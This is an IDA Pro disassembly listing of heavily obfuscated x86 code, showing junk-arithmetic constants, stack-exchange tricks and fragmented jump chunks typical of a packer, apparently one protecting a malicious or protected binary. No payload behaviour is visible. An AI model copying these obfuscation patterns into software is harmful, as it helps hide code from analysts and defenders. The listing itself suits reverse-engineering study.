; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_440E37:				; CODE XREF: sub_443BAF:loc_44032Dj
		mov	eax, ecx
		xchg	eax, [esp+4+var_4]
		push	4E928DC2h
		xchg	esi, [esp+8+var_8]
		mov	ecx, esi
		pop	esi
		rol	ecx, 13h
		jmp	loc_459AC8
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------

loc_440E4F:				; CODE XREF: y2kk37jd:00453127j
		add	edx, edi

; =============== S U B	R O U T	I N E =======================================



sub_440E51	proc near		; CODE XREF: sub_45AC8D-18AEAp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00443765 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xchg	esi, [esp-4+arg_0]
		jmp	loc_443765
sub_440E51	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_440E5D:				; CODE XREF: sub_43F346+155F7j
		add	eax, [ebp-4]
		push	offset sub_446861
		jmp	nullsub_149
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E63A

loc_440E6A:				; CODE XREF: sub_44E63A:loc_43C8D1j
		mov	ecx, edx
		pop	edx
		and	ecx, 98D46B9Ch
		add	ecx, 0F8406AD5h
		xchg	ecx, [esp+4+var_4]
		jmp	loc_446C6B
; END OF FUNCTION CHUNK	FOR sub_44E63A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451464

loc_440E81:				; CODE XREF: sub_451464-1611Dj
		xor	ebx, 215208FEh

loc_440E87:				; CODE XREF: sub_451464:loc_4446C9j
		call	sub_45405E
		call	sub_43B4CB
; END OF FUNCTION CHUNK	FOR sub_451464
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_440E91:				; CODE XREF: sub_4492F7-2565j
		jmp	loc_44ADA6
; END OF FUNCTION CHUNK	FOR sub_4492F7
; ---------------------------------------------------------------------------

loc_440E96:				; CODE XREF: y2kk37jd:0044F515j
		push	4640680Ch
		xor	edx, edi
		jmp	loc_445FA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447407

loc_440EA2:				; CODE XREF: sub_447407:loc_43B0E2j
		call	sub_43BA66
		or	eax, eax
		jnz	loc_45ACEB
		jmp	loc_440738
; END OF FUNCTION CHUNK	FOR sub_447407
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446861

loc_440EB4:				; CODE XREF: sub_446861:loc_45A502j
		mov	eax, [eax+20h]

loc_440EB7:				; CODE XREF: sub_443674+Aj
		add	eax, [ebp-4]
		xor	edx, edx
		push	edx
		jmp	loc_43B695
; END OF FUNCTION CHUNK	FOR sub_446861

; =============== S U B	R O U T	I N E =======================================



sub_440EC2	proc near		; DATA XREF: y2kk37jd:loc_458235o
		call	sub_440EC8
		retn
sub_440EC2	endp


; =============== S U B	R O U T	I N E =======================================



sub_440EC8	proc near		; CODE XREF: sub_44753E:loc_43D09Bj
					; sub_440EC2p

var_14		= dword	ptr -14h
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C8D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445139 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00446931 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00447F12 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044B72C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044F8CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453B46 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045A180 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045B419 SIZE 00000005 BYTES

		jnb	sub_443EAB
		push	esi
		mov	esi, ebp
		jmp	loc_447F12
sub_440EC8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_440ED6:				; CODE XREF: sub_4599BE-13105j
		jz	loc_4455D8
		jmp	loc_44AE6D
; END OF FUNCTION CHUNK	FOR sub_4599BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455531

loc_440EE1:				; CODE XREF: sub_455531:loc_45553Bj
		push	1A8E2ED2h
		pop	esi
		sub	esi, 60A6079Fh
		test	esi, 8000h
		jmp	loc_4563EA
; END OF FUNCTION CHUNK	FOR sub_455531
; ---------------------------------------------------------------------------

loc_440EF8:				; CODE XREF: y2kk37jd:loc_44E145j
		xor	esi, 0CC746024h
		add	esi, 0B7A6918Dh
		xchg	esi, [esp]
		jmp	loc_4547DF

; =============== S U B	R O U T	I N E =======================================



sub_440F0C	proc near		; CODE XREF: y2kk37jd:0044781Dj
					; sub_43F346+19F0Cp

; FUNCTION CHUNK AT 0043D037 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F3CF SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004403BC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00440B46 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004426DD SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00446B3E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448446 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044A63D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451E15 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452335 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B051 SIZE 00000012 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	edi
		mov	edi, esi
		xchg	edi, [esp+0]
		push	0D127FB76h
		pop	esi
		add	esi, ds:4000EFh
		jmp	loc_446B3E
sub_440F0C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		add	edx, 674620F2h
		jmp	sub_453BF3
; ---------------------------------------------------------------------------

loc_440F32:				; CODE XREF: y2kk37jd:0044827Cj
		sbb	eax, edx
		jmp	loc_451038
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D1BD

loc_440F39:				; CODE XREF: sub_43D1BD+1BA26j
		jge	loc_444413

loc_440F3F:				; CODE XREF: y2kk37jd:0045B2EBj
		jmp	nullsub_257
; END OF FUNCTION CHUNK	FOR sub_43D1BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_440F44:				; CODE XREF: sub_45B7AA-10BD2j
		jmp	loc_4464EE
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
		adc	esi, 81885323h
		adc	edx, ecx
		jmp	loc_444413

; =============== S U B	R O U T	I N E =======================================



sub_440F56	proc near		; CODE XREF: sub_4574B7:loc_45271Dj
		add	esp, 0FFFFFFF8h
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	[ebp-8], eax
		push	offset sub_43ED32
		jmp	nullsub_210
sub_440F56	endp

; ---------------------------------------------------------------------------
		and	edi, 36E8F7C4h
		jmp	loc_43C2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_440F77:				; CODE XREF: sub_443AA7-825Cj
		jbe	loc_44751B

loc_440F7D:				; CODE XREF: sub_443AA7:loc_4481CCj
					; sub_44113A:loc_45604Cj
		pop	large dword ptr	fs:0
		add	esp, 4
		mov	eax, 51h
		call	sub_454413
		push	offset sub_43DA24
		jmp	nullsub_53
; END OF FUNCTION CHUNK	FOR sub_443AA7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_478. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44704D

loc_440F9C:				; CODE XREF: sub_44704D+D1FFj
		jmp	loc_44F064
; END OF FUNCTION CHUNK	FOR sub_44704D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AB95

loc_440FA1:				; CODE XREF: sub_44AB95+24j
		jmp	sub_44461D
; END OF FUNCTION CHUNK	FOR sub_44AB95
; ---------------------------------------------------------------------------

loc_440FA6:				; CODE XREF: y2kk37jd:loc_443EEAj
		push	edi
		push	0EE13EB83h
		pop	edi
		jmp	loc_43D916
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_46. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E20

loc_440FB3:				; CODE XREF: sub_454E20-1835j
		jmp	nullsub_521
; END OF FUNCTION CHUNK	FOR sub_454E20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_440FB8:				; CODE XREF: sub_445226+CA8Dj
		jmp	nullsub_206
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443360

loc_440FBD:				; CODE XREF: sub_443360:loc_458B22j
		mov	ebx, eax
		push	offset sub_4537EF
		jmp	loc_443031
; END OF FUNCTION CHUNK	FOR sub_443360

; =============== S U B	R O U T	I N E =======================================



sub_440FC9	proc near		; DATA XREF: sub_43C326+1F3DDo

; FUNCTION CHUNK AT 0043DCA0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044B1D2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CFCE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453BF9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AEE5 SIZE 00000005 BYTES

		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_441FA1
		jmp	loc_45AEE5
sub_440FC9	endp

; ---------------------------------------------------------------------------

loc_440FDD:				; CODE XREF: y2kk37jd:00444B50j
		mov	[edx], ecx

; =============== S U B	R O U T	I N E =======================================



sub_440FDF	proc near		; CODE XREF: y2kk37jd:loc_45A2CEp

; FUNCTION CHUNK AT 0043FA8C SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00441D9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446E9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E92D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044F3F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451244 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004543D1 SIZE 0000000E BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebx
		jmp	loc_451244
sub_440FDF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	4423A590h
		pop	eax
		add	eax, 5A7C45ADh
		sub	eax, 0D70C536Ah
		xor	eax, 6051C4BFh
		call	sub_442C3E
; START	OF FUNCTION CHUNK FOR sub_44A33C

loc_441006:				; CODE XREF: sub_44A33C+95B2j
		jmp	loc_446A4C
; END OF FUNCTION CHUNK	FOR sub_44A33C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FFF0

loc_44100B:				; CODE XREF: sub_43FFF0+10j
		sub	edx, 1EF416B0h
		xor	edx, 0F9153B74h
		and	edx, 28136681h
		add	edx, 0D842097Bh
		xchg	edx, [esp+0]
		jmp	loc_457BBB
; END OF FUNCTION CHUNK	FOR sub_43FFF0
; ---------------------------------------------------------------------------

loc_44102B:				; CODE XREF: y2kk37jd:004495C9j
		jno	loc_443D71
		xor	esi, 627CE1D5h
		jmp	loc_44698D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BBF8

loc_44103C:				; CODE XREF: sub_45BBF8+Aj
		push	edx
		push	ebx
		push	0DF5049BFh
		pop	ebx
; END OF FUNCTION CHUNK	FOR sub_45BBF8
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_441044:				; CODE XREF: sub_43B8D6:loc_4425CEj
		jmp	loc_44F081
; END OF FUNCTION CHUNK	FOR sub_43B8D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE8B

loc_441049:				; CODE XREF: sub_43DE8B+Bj
		pop	esi
		xchg	esi, [esp+8+var_8]
		mov	esp, ebp
		xchg	ecx, [esp+4+var_4]
		mov	ebp, ecx
		pop	ecx
		jmp	loc_44E8C0
; END OF FUNCTION CHUNK	FOR sub_43DE8B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_44105A:				; CODE XREF: sub_44606C:loc_44AE62j
					; y2kk37jd:0044AE7Cj
		and	edx, 656EB69Ah
		add	edx, 0C01B3EBAh
		mov	[edx], eax
		xchg	esi, [esp+4+var_4]
		jmp	loc_4530B4
; END OF FUNCTION CHUNK	FOR sub_44606C

; =============== S U B	R O U T	I N E =======================================



sub_441070	proc near		; DATA XREF: sub_44606C+13B52o

; FUNCTION CHUNK AT 0044D1C0 SIZE 00000005 BYTES

		mov	ebp, [eax]
		push	offset loc_44E94D
		jmp	loc_44D1C0
sub_441070	endp

; ---------------------------------------------------------------------------

loc_44107C:				; CODE XREF: y2kk37jd:00456EE5j
		xor	edi, edx

; =============== S U B	R O U T	I N E =======================================



sub_44107E	proc near		; CODE XREF: sub_456890-1297p

var_4		= dword	ptr -4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043D4E9 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043E31B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FFB2 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00443DAC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044444A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444500 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445F41 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044682B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447E78 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00448083 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AA80 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C74A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044D46A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E428 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045203D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004537A6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045471E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004558F6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455D09 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00457E19 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045A0EF SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045BF69 SIZE 00000005 BYTES

		xchg	edx, [esp+4+var_4]
		pop	edx
		push	ecx
		jmp	loc_45BF69
sub_44107E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	edx
		push	939044A5h
		pop	edx
		and	edx, 0E57D4CCBh
		jmp	loc_4463FB
; ---------------------------------------------------------------------------

loc_44109A:				; DATA XREF: y2kk37jd:0044EC91o
		xchg	ecx, [esp]
		push	eax
		mov	edx, eax

loc_4410A0:				; CODE XREF: y2kk37jd:loc_454562j
		call	sub_4581BB
		push	edi
		push	455FA28Bh
		pop	edi
		rol	edi, 16h
		jmp	loc_43D7F0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_336. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455556

loc_4410B5:				; CODE XREF: sub_455556+3189j
		jmp	loc_44F28A
; END OF FUNCTION CHUNK	FOR sub_455556
; ---------------------------------------------------------------------------

loc_4410BA:				; CODE XREF: y2kk37jd:0043F6BBj
		or	esi, edx
		not	ecx
		jmp	loc_447BEE
; ---------------------------------------------------------------------------

loc_4410C3:				; CODE XREF: y2kk37jd:004523A8j
		cmp	eax, 0F79348ECh
		jmp	loc_4459A4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_331. PRESS KEYPAD	"+" TO EXPAND]
		db 0Fh
		dd 0DB948Ah, 1AE7C100h

; =============== S U B	R O U T	I N E =======================================



sub_4410D8	proc near		; CODE XREF: sub_448DCA+51EEp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00443EE0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454AD1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004576D9 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00458EF6 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	eax
		push	esi
		push	8960CCDh
		pop	esi
		jmp	loc_443EE0
sub_4410D8	endp

; ---------------------------------------------------------------------------

loc_4410E9:				; CODE XREF: y2kk37jd:00455B35j
		xor	ebx, 0C672A9C8h
		cdq
		add	ebp, 1102FC35h

loc_4410F6:				; CODE XREF: y2kk37jd:loc_455B1Ej
		xor	eax, 9B525656h
		add	eax, 0B9087C98h
		xchg	eax, [esp]
		jmp	loc_44382A
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504BC

loc_44110B:				; CODE XREF: sub_4504BC+16j
		jmp	loc_440577
; END OF FUNCTION CHUNK	FOR sub_4504BC
; ---------------------------------------------------------------------------
dword_441110	dd 0			; DATA XREF: sub_440337:loc_448E83r
					; sub_440337:loc_44CAD9r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_441114:				; CODE XREF: sub_44D302+8B63j
		jmp	loc_4441E9
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444899

loc_441119:				; CODE XREF: sub_444899+Dj
		jmp	loc_440850
; END OF FUNCTION CHUNK	FOR sub_444899
; ---------------------------------------------------------------------------
		dw 9B04h
dword_441120	dd 4A2A5355h, 8CB88C66h	; DATA XREF: sub_440337+6ED8o
					; sub_452568+6o
		db 0B1h, 36h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_44112B:				; CODE XREF: sub_43B0F5+13B59j
		jmp	loc_45B6AD
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_441130:				; CODE XREF: sub_4597AE-1515Cj
		jmp	loc_44487D
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CC31

loc_441135:				; CODE XREF: sub_44CC31-967Dj
		jmp	loc_44AED0
; END OF FUNCTION CHUNK	FOR sub_44CC31

; =============== S U B	R O U T	I N E =======================================



sub_44113A	proc near		; CODE XREF: sub_4450D1-8E43p
					; sub_4587BA:loc_43D0A5p ...

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B39F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B630 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EAC0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043FBFF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440CFC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004420E7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442818 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044306E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443198 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00445965 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044634F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00446392 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004466A6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447752 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044822F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448BC6 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00449815 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449D6B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00449FDA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044A9FB SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044B99B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D4EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D5FC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044DDDA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F29E SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044FB4B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00450D8A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00453CCD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004549D3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00454D4C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454F43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045521A SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045587C SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00455DAE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045604C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00457C3D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459B64 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B330 SIZE 00000019 BYTES

		jb	loc_45B336
		mov	edx, ds:dword_4431A0
		or	edx, edx
		jnz	loc_449D6B
		jmp	loc_44306E
sub_44113A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457533

loc_441153:				; CODE XREF: sub_457533-E4D0j
		pop	edx
		push	eax
		mov	[esi], edi
		jmp	loc_43F625
; END OF FUNCTION CHUNK	FOR sub_457533
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_94. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456BAC

loc_44115D:				; CODE XREF: sub_456BAC+Ej
		jmp	loc_445881
; END OF FUNCTION CHUNK	FOR sub_456BAC
; ---------------------------------------------------------------------------

loc_441162:				; CODE XREF: y2kk37jd:0045395Ej
		jle	loc_444993
		cdq
		jmp	loc_452579
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455E0B

loc_44116E:				; CODE XREF: sub_455E0B:loc_447199j
		cmp	dword ptr [ebp-4], 100h
		jnz	loc_43BF3A
		jmp	loc_459517
; END OF FUNCTION CHUNK	FOR sub_455E0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B489

loc_441180:				; CODE XREF: sub_44B489:loc_44BA8Aj
		pop	edx
		rol	edx, 13h
		and	edx, 45311AE6h
		xor	edx, ds:4000F2h
		push	offset sub_45689F
		jmp	loc_4476B6
; END OF FUNCTION CHUNK	FOR sub_44B489
; ---------------------------------------------------------------------------

loc_44119A:				; DATA XREF: sub_43BF31+F3B5o
		push	6B05340Fh
		pop	ebx
		rol	ebx, 11h
		and	ebx, 5760AA0Ch
		rol	ebx, 1Eh
		or	ebx, 0E291993Ch
		add	ebx, 0DB02712h

loc_4411B8:				; CODE XREF: y2kk37jd:0043D9F0j
		jmp	loc_44A6D4
; ---------------------------------------------------------------------------

loc_4411BD:				; CODE XREF: y2kk37jd:0044203Ej
		xor	ecx, 947D361Eh

; =============== S U B	R O U T	I N E =======================================



sub_4411C3	proc near		; CODE XREF: sub_43F5BD:loc_4414EFp

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043B497 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043B5D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B8D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BB44 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BF54 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C98F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CCE4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D0F9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043D790 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043E9D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440196 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004403C3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044065C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004406EC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004407A9 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00440C04 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441672 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441CBD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004422C3 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00442396 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00442441 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004424F4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00442B92 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004431C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004440BA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00446093 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446778 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446878 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00447002 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044750B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044782D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447CF8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00447D65 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449D44 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00449F46 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044B1AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B9D3 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044BB77 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044C0C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C993 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044CCFB SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044DC67 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044E986 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044F91B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450BD6 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004512DE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00451675 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451DE8 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004527C6 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00452F5A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00453248 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453449 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045420B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045480A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00454E5D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00456038 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004566E3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456F85 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004578D3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004579DC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045856E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458736 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00458A4A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00458E1C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045951C SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045AD84 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045AE90 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045B2BE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045BC96 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045BD7A SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045C3F4 SIZE 00000005 BYTES

		xchg	ebx, [esp+4+var_4]
		pop	ebx
		sub	al, 99h
		push	0F669EB36h
		pop	edx
		sub	edx, 674D1545h
		add	edx, 0D53E50F1h
		jmp	loc_45856E
sub_4411C3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF5F

loc_4411E0:				; CODE XREF: sub_43BF5F:loc_440332j
		jo	loc_453DBF
		test	edi, 567CC035h
		jmp	loc_4517D7
; END OF FUNCTION CHUNK	FOR sub_43BF5F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_4411F1:				; CODE XREF: sub_45B7AA:loc_45B839j
		cmp	ebx, 855AC04Fh
		jmp	loc_45879A
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4411FC:				; CODE XREF: sub_445226:loc_456962j
		jnz	loc_456014
		jmp	loc_44FA10
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_441207:				; CODE XREF: y2kk37jd:00452D9Aj
		xor	eax, 5933EE54h
		push	eax
		push	9E4726E1h
		call	sub_45C3AC
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_441218:				; CODE XREF: sub_43C46D+189DAj
		jmp	loc_44A5C5
